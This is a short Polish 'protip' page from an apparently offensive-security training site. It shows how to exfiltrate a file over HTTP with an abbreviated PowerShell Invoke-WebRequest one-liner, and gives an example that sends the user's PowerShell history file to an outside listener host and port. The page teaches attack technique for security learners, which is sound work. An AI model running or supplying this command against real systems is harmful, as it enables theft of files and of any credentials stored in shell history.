alphasec academy

Szybka eksfiltracja pliku po HTTP: iwr -me po -i <plik> http://<host:port>

Dodatkowe informacje

iwr to dobrze już nam znany Invoke-WebRequest, do tego brzydko skracamy jego parametry a nawet wartości, czyli:
  • -me po
    - metoda POST, bez skracania byłoby
    -method post
    ; możemy również użyć PUT (-me pu)
  • -i <plik>
    - wyślij zawartość wskazanego pliku (
    -InFile <plik>
    )
  • http://<host:port>
    - docelowy host i port, nawet nie mnusi być to pełnoprawny serwer HTTP, wystarczy prosty listener, np. ten z aptm.in/protip/001b
Żeby więc na przykład wyeksfiltrować historię Powershella na port 2048 hosta exfil.aptmc.pl moglibyśmy zrobić:
        iwr -me po -i (Get-PSReadLineOption).HistorySavePath http://exfil.aptmc.pl:2048
    

Przydatne linki


Subskrybuj

Jeśli chcesz otrzymywać nowe, mięsiste protipy na maila, a także zostać czasem powiadomiony o wartościowych wydarzeniach - dołącz do subskrybentów.